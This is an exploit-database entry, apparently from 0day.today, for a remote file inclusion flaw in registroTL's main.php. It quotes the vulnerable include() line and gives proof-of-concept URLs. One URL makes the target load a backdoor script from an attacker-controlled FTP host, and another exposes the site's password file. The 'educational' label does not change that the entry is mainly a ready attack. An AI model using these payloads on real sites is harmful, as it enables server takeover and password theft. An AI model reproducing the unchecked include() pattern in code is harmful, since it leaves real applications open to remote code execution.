Lucene search

K
zdtDarkFig1337DAY-ID-946
HistoryOct 10, 2006 - 12:00 a.m.

registroTL (main.php) Remote File Include Vulnerability

2006-10-1000:00:00
DarkFig
0day.today
16

Exploit for unknown platform in category web applications

=======================================================
registroTL (main.php) Remote File Include Vulnerability
=======================================================


#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?

# Affected.scr: registroTL
# Poc.........: http://victim.com/main.php?page=ftp://hack.com/backdrphpext
#               http://victim.com/usuarios.dat <- Passwords disclosure
# Vuln.code...: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
#               include($_GET['page'].".php");



#  0day.today [2018-04-09]  #